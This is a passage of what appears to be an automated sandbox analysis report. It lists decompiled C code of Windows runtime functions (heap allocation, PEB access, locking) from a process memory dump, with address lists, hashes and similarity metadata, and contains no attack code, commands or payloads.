				_t68 = L047F4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                                        0x04857016
                                                        0x0485701e
                                                        0x0485702b
                                                        0x04857033
                                                        0x04857037
                                                        0x0485703c
                                                        0x0485703e
                                                        0x04857041
                                                        0x04857045
                                                        0x0485704a
                                                        0x04857050
                                                        0x04857055
                                                        0x0485705a
                                                        0x04857062
                                                        0x04857062
                                                        0x0485705a
                                                        0x04857064
                                                        0x04857064
                                                        0x04857067
                                                        0x04857071
                                                        0x04857096
                                                        0x0485709b
                                                        0x048570a2
                                                        0x048570a6
                                                        0x048570a7
                                                        0x048570ad
                                                        0x048570b3
                                                        0x048570b6
                                                        0x048570bb
                                                        0x048570c3
                                                        0x048570c3
                                                        0x048570c6
                                                        0x048570cd
                                                        0x048570dd
                                                        0x048570e0
                                                        0x048570e2
                                                        0x048570e2
                                                        0x048570ee
                                                        0x04857101
                                                        0x048570f0
                                                        0x048570f9
                                                        0x048570f9
                                                        0x0485710a
                                                        0x0485710e
                                                        0x04857112
                                                        0x04857117
                                                        0x04857118
                                                        0x04857118
                                                        0x048570bb
                                                        0x0485711d
                                                        0x04857123
                                                        0x04857131
                                                        0x04857131
                                                        0x04857136
                                                        0x0485713d
                                                        0x0485713e
                                                        0x0485713f
                                                        0x0485714a
                                                        0x0485714a
                                                        0x04857084
                                                        0x04857088
                                                        0x00000000
                                                        0x0485708e
                                                        0x0485708e
                                                        0x04857092
                                                        0x00000000
                                                        0x04857092

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 51455809fa064dd0cd34f1cfb18dcbe5033c3c43973084cd28dd7aa4442ca9c2
                                                        • Instruction ID: c1c00f9543bcd7cea50ec975a32ec9ffc429cf7495afbb2c44371489e81ff69f
                                                        • Opcode Fuzzy Hash: 51455809fa064dd0cd34f1cfb18dcbe5033c3c43973084cd28dd7aa4442ca9c2
                                                        • Instruction Fuzzy Hash: E33192726047519BC320EF68C940A6AB7E9BF88700F048A29FD95D77A0E770F904C7A6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047FC182, Relevance: .1, Instructions: 104COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 68%
                                                        			E047FC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E047F7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E048A8D34(_v8, _t80);
					}
					E047F2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E047EFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E048A8833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E047EFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0481B180();
						if(_a4 != 0) {
							E047F2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E047FBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E047FBB2D(_t16, _t15);
						E047FB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E047EFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E047EFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E047EFFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                                        0x047fc18d
                                                        0x047fc18f
                                                        0x047fc191
                                                        0x047fc19b
                                                        0x047fc1a0
                                                        0x047fc1d4
                                                        0x047fc1de
                                                        0x04842d6e
                                                        0x047fc1e4
                                                        0x047fc1e4
                                                        0x047fc1e4
                                                        0x047fc1ec
                                                        0x04842d7d
                                                        0x04842d7d
                                                        0x047fc1f3
                                                        0x047fc1ff
                                                        0x04842d88
                                                        0x04842d8d
                                                        0x04842d94
                                                        0x04842d94
                                                        0x04842d9f
                                                        0x04842da4
                                                        0x04842dab
                                                        0x04842db0
                                                        0x04842db2
                                                        0x04842db3
                                                        0x04842db4
                                                        0x04842dbc
                                                        0x04842dc3
                                                        0x04842dc3
                                                        0x047fc205
                                                        0x047fc205
                                                        0x047fc208
                                                        0x047fc20e
                                                        0x047fc211
                                                        0x047fc216
                                                        0x047fc219
                                                        0x047fc21f
                                                        0x047fc222
                                                        0x047fc22c
                                                        0x047fc234
                                                        0x047fc23a
                                                        0x047fc23f
                                                        0x047fc245
                                                        0x047fc24b
                                                        0x047fc251
                                                        0x047fc25a
                                                        0x047fc276
                                                        0x047fc27d
                                                        0x047fc27d
                                                        0x047fc25c
                                                        0x047fc25c
                                                        0x00000000
                                                        0x047fc25e
                                                        0x047fc1a4
                                                        0x047fc1aa
                                                        0x047fc1b3
                                                        0x047fc265
                                                        0x047fc26c
                                                        0x047fc26c
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                        • Instruction ID: 1b47dac8dcb302a0745d2a13d877dba8494abbbb1465a7a4640e126c7f23f4ea
                                                        • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                        • Instruction Fuzzy Hash: A0314472B0158ABEE706EBF5C880BE9F754BF86208F04425AD21887341DB347A19DBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0480A70E, Relevance: .1, Instructions: 96COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 92%
                                                        			E0480A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x48c7b10; // 0x8
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x48c7b10 = 8;
					 *0x48c7b14 = 0x48c7b0c;
					 *0x48c7b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x9
					E0480A990(0x48c7b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L0480A840(__edx, __ecx, __ecx, _t52, 0x48c7b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x48c7b10; // 0x8
					_t3 = _t37 + 0x27; // 0x2f
					__eflags = _t3 >> 5 -  *0x48c7b18; // 0x1
					if(__eflags > 0) {
						_t38 =  *0x48c7b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x2f
						_v8 = _t4 >> 5;
						_t50 = L047F4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x48c7b18 = _v8;
						_t8 = _t52 + 7; // 0xf
						E0481F3E0(_t50,  *0x48c7b14, _t8 >> 3);
						_t28 =  *0x48c7b14; // 0x773b7b0c
						__eflags = _t28 - 0x48c7b0c;
						if(_t28 != 0x48c7b0c) {
							L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x10
						 *0x48c7b14 = _t50;
						_t48 = _v12;
						 *0x48c7b10 = _t9;
						goto L6;
					}
					 *0x48c7b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                                        0x0480a713
                                                        0x0480a714
                                                        0x0480a717
                                                        0x0480a71d
                                                        0x0480a720
                                                        0x0480a722
                                                        0x0480a727
                                                        0x0480a74a
                                                        0x0480a754
                                                        0x0480a75e
                                                        0x0480a768
                                                        0x0480a76a
                                                        0x0480a773
                                                        0x0480a78b
                                                        0x0480a790
                                                        0x0480a792
                                                        0x0480a741
                                                        0x0480a741
                                                        0x0480a743
                                                        0x0480a749
                                                        0x0480a749
                                                        0x0480a732
                                                        0x0480a73a
                                                        0x0480a797
                                                        0x0480a79d
                                                        0x0480a7a3
                                                        0x0480a7a9
                                                        0x0480a7b6
                                                        0x0480a7bc
                                                        0x0480a7ca
                                                        0x0480a7e0
                                                        0x0480a7e2
                                                        0x0480a7e4
                                                        0x04849bf2
                                                        0x00000000
                                                        0x04849bf2
                                                        0x0480a7ed
                                                        0x0480a7f2
                                                        0x0480a800
                                                        0x0480a805
                                                        0x0480a80d
                                                        0x0480a812
                                                        0x04849c08
                                                        0x04849c08
                                                        0x0480a818
                                                        0x0480a81b
                                                        0x0480a821
                                                        0x0480a824
                                                        0x00000000
                                                        0x0480a824
                                                        0x0480a7ae
                                                        0x00000000
                                                        0x0480a7ae
                                                        0x0480a73c
                                                        0x0480a73e
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0abaf6e076936786ab8f6eb6aa5c0f53f3925d5c942ea8a634485437c9a6f9e3
                                                        • Instruction ID: 061eb8fe30ba36669ea38382e88c1ae8c9e42ee6321a62ee29b9858806c70f79
                                                        • Opcode Fuzzy Hash: 0abaf6e076936786ab8f6eb6aa5c0f53f3925d5c942ea8a634485437c9a6f9e3
                                                        • Instruction Fuzzy Hash: 2A31CCB16202069BD715CB18DC80F6AB7F9EB94714F148E5AE155D7380E3B8BD01DF92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048061A0, Relevance: .1, Instructions: 93COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 97%
                                                        			E048061A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E04805E50(0x47b67cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E048A9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E047DF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                                        0x048061b3
                                                        0x048061b5
                                                        0x048061bd
                                                        0x048061c3
                                                        0x048061c7
                                                        0x048061d2
                                                        0x048061ff
                                                        0x048061ff
                                                        0x04806201
                                                        0x04806207
                                                        0x04806207
                                                        0x048061d4
                                                        0x048061d9
                                                        0x00000000
                                                        0x00000000
                                                        0x048061df
                                                        0x048061e2
                                                        0x00000000
                                                        0x00000000
                                                        0x048061e6
                                                        0x048061e8
                                                        0x048061ee
                                                        0x048061ee
                                                        0x048061f9
                                                        0x0484762f
                                                        0x04847632
                                                        0x04847635
                                                        0x04847639
                                                        0x04847640
                                                        0x0484766e
                                                        0x04847675
                                                        0x00000000
                                                        0x00000000
                                                        0x04847681
                                                        0x04847689
                                                        0x0484768d
                                                        0x04847691
                                                        0x04847695
                                                        0x04847699
                                                        0x048476af
                                                        0x048476b5
                                                        0x048476b7
                                                        0x048476b7
                                                        0x048476d7
                                                        0x048476dc
                                                        0x00000000
                                                        0x048476dc
                                                        0x048476a2
                                                        0x048476a9
                                                        0x04847651
                                                        0x04847653
                                                        0x04847653
                                                        0x04847656
                                                        0x04847656
                                                        0x00000000
                                                        0x04847656
                                                        0x04847644
                                                        0x04847646
                                                        0x04847648
                                                        0x04847648
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1d4f84c561e414608cf85946ef0040489451a4332388e7054fcac516ec0beac9
                                                        • Instruction ID: db3755c914112a3773e125f704ad1f59bc877f2fb521e8d9c052e5afbe559b66
                                                        • Opcode Fuzzy Hash: 1d4f84c561e414608cf85946ef0040489451a4332388e7054fcac516ec0beac9
                                                        • Instruction Fuzzy Hash: 61317C716153058FD3A0DF19C800B26B7E5FB88B14F058E6DE994D7391E7B0E804CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047DAA16, Relevance: .1, Instructions: 93COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 95%
                                                        			E047DAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x48cd360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x48c7b9c; // 0x0
					_t53 = L047F4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E0481B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0481F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L047E6C59(_t53, _t51, _t58) != 0) {
							_t28 = E04805E50(0x47bc338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0480B230(_v32, _v28, 0x47bc2d8, 1,  &_v24);
								_t28 = E047DF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                                        0x047daa25
                                                        0x047daa29
                                                        0x047daa2d
                                                        0x047daa30
                                                        0x047daa37
                                                        0x047daa3c
                                                        0x04834458
                                                        0x04834458
                                                        0x04834472
                                                        0x04834474
                                                        0x04834476
                                                        0x047daa64
                                                        0x047daa74
                                                        0x0483447c
                                                        0x04834483
                                                        0x04834492
                                                        0x047daa52
                                                        0x047daa54
                                                        0x047daa5e
                                                        0x048344a8
                                                        0x048344ad
                                                        0x048344af
                                                        0x048344b6
                                                        0x048344b6
                                                        0x048344b9
                                                        0x048344bc
                                                        0x048344cd
                                                        0x048344d3
                                                        0x048344d6
                                                        0x048344e1
                                                        0x048344e1
                                                        0x048344e6
                                                        0x048344e8
                                                        0x048344fb
                                                        0x048344fb
                                                        0x048344e8
                                                        0x00000000
                                                        0x047daa5e
                                                        0x04834476
                                                        0x047daa42
                                                        0x047daa46
                                                        0x047daa48
                                                        0x047daa4c
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d75fae556aceb481a33cece50ec476587c88721eebc61d4fa946722e89dabf62
                                                        • Instruction ID: 21661922df0d61757bd412cad2c0ecc7a693d2508456487bfa5130ad3d6053e1
                                                        • Opcode Fuzzy Hash: d75fae556aceb481a33cece50ec476587c88721eebc61d4fa946722e89dabf62
                                                        • Instruction Fuzzy Hash: 5131D171A10619ABDF119F68CD41ABFB3B8FF44704F04456AF901E7250E774B911DBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04818EC7, Relevance: .1, Instructions: 92COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 93%
                                                        			E04818EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x48cd360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E04804E70(0x48c86e4, 0x4819490, 0, 0);
					if( *0x48c53e8 > 5 && E04818F33(0x48c53e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x48c53e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x48c53e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0x47bbc46;
						_t48 = E04857B9C(0x48c53e8, 0x47bbc46, _t67, 0x48c53e8, _t70,  &_v140);
					}
				}
				return E0481B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}











































                                                        0x04818ec7
                                                        0x04818ed9
                                                        0x04818edc
                                                        0x04818ee6
                                                        0x04818ee9
                                                        0x04818eee
                                                        0x04818efc
                                                        0x04818f08
                                                        0x04851349
                                                        0x04851353
                                                        0x0485135d
                                                        0x04851366
                                                        0x0485136f
                                                        0x04851375
                                                        0x0485137c
                                                        0x04851385
                                                        0x04851390
                                                        0x04851391
                                                        0x0485139c
                                                        0x0485139d
                                                        0x048513a6
                                                        0x048513ac
                                                        0x048513b2
                                                        0x048513b5
                                                        0x048513bc
                                                        0x048513bf
                                                        0x048513c2
                                                        0x048513c5
                                                        0x048513c8
                                                        0x048513cb
                                                        0x048513ce
                                                        0x048513d1
                                                        0x048513d4
                                                        0x048513d7
                                                        0x048513da
                                                        0x048513dd
                                                        0x048513e0
                                                        0x048513e3
                                                        0x048513e6
                                                        0x048513e9
                                                        0x048513f6
                                                        0x04851400
                                                        0x04851400
                                                        0x04818f08
                                                        0x04818f32

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 66ef781a260d9611c01d7c6b9a5f65e976a746d687f824a054581abe753cac0b
                                                        • Instruction ID: dfbd9440ff2a558515f52ef4c5a3001a8435daa866167724b22c5383ad02cc77
                                                        • Opcode Fuzzy Hash: 66ef781a260d9611c01d7c6b9a5f65e976a746d687f824a054581abe753cac0b
                                                        • Instruction Fuzzy Hash: F541B4B1D002189FDB10DFAAD981AADFBF9FB48314F50466EE509E7200D774AA44CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04814A2C, Relevance: .1, Instructions: 92COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E04814A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x48cd360 ^ _t62;
				_v8 =  *0x48cd360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E047F2280(_t26, 0x48c8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E047EFFB0(_t41, _t51, 0x48c8608);
						L2:
						 *0x48cb1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E0481B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E047F2280(_t28, 0x48c8608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E047EFFB0(_t42, _t53, 0x48c8608);
							if(_t53 != 0) {
								L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E047EFFB0(_t41, _t51, 0x48c8608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}
























                                                        0x04814a2c
                                                        0x04814a34
                                                        0x04814a3c
                                                        0x04814a3e
                                                        0x04814a48
                                                        0x04814a4b
                                                        0x04814a4d
                                                        0x04814a51
                                                        0x04814a9c
                                                        0x00000000
                                                        0x00000000
                                                        0x04814aa3
                                                        0x04814aa8
                                                        0x04814aad
                                                        0x04814ab1
                                                        0x04814ade
                                                        0x04814ae3
                                                        0x04814a5a
                                                        0x04814a62
                                                        0x04814a6a
                                                        0x04814a6e
                                                        0x0484f203
                                                        0x04814a84
                                                        0x04814a88
                                                        0x04814a89
                                                        0x04814a8a
                                                        0x04814a95
                                                        0x04814a95
                                                        0x04814a79
                                                        0x04814a80
                                                        0x04814af2
                                                        0x04814af4
                                                        0x04814af9
                                                        0x04814aff
                                                        0x04814b01
                                                        0x04814b03
                                                        0x04814b08
                                                        0x0484f20a
                                                        0x0484f212
                                                        0x0484f216
                                                        0x0484f216
                                                        0x04814b08
                                                        0x04814b13
                                                        0x04814b1a
                                                        0x0484f229
                                                        0x0484f229
                                                        0x04814b1a
                                                        0x04814a82
                                                        0x00000000
                                                        0x04814a82
                                                        0x04814ab7
                                                        0x04814acd
                                                        0x04814acd
                                                        0x04814ad5
                                                        0x04814ada
                                                        0x00000000
                                                        0x04814ada
                                                        0x04814ac2
                                                        0x04814acb
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x04814acb
                                                        0x04814a53
                                                        0x04814a53
                                                        0x04814a58
                                                        0x00000000

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
